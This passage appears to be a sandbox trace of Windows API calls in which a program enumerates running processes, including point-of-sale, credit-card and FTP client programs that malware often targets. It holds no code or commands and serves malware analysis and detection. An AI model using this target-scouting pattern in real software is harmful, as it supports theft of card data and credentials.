cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0234.541] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0234.653] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0234.655] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0234.656] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0234.658] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0234.659] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0234.661] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0234.662] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0234.664] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0234.665] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0234.674] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0234.675] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0234.676] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0234.678] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0234.679] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0234.681] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0234.683] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0234.685] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0234.686] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0234.688] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0234.689] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.691] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0234.693] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0234.695] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0234.696] CloseHandle (hObject=0x1b08) returned 1 [0234.696] Sleep (dwMilliseconds=0x64) [0234.816] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0234.827] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.829] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0234.830] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0234.831] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.833] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0234.834] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.835] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0234.837] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0234.838] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0234.843] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.844] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.846] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0234.847] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.848] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.850] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.851] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.852] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.854] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.893] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.897] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0234.900] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0234.905] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0234.907] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.909] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0234.911] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0234.913] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0234.915] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0234.917] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0234.922] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.924] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0234.926] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0234.928] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.930] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0234.980] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0234.987] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0234.989] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0234.991] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0234.993] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0234.995] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0235.000] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0235.002] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0235.004] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0235.006] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0235.008] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0235.010] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0235.015] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0235.017] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0235.019] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0235.020] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0235.022] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0235.024] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0235.045] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0235.047] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0235.048] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0235.049] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0235.051] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0235.052] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0235.053] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0235.055] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0235.057] 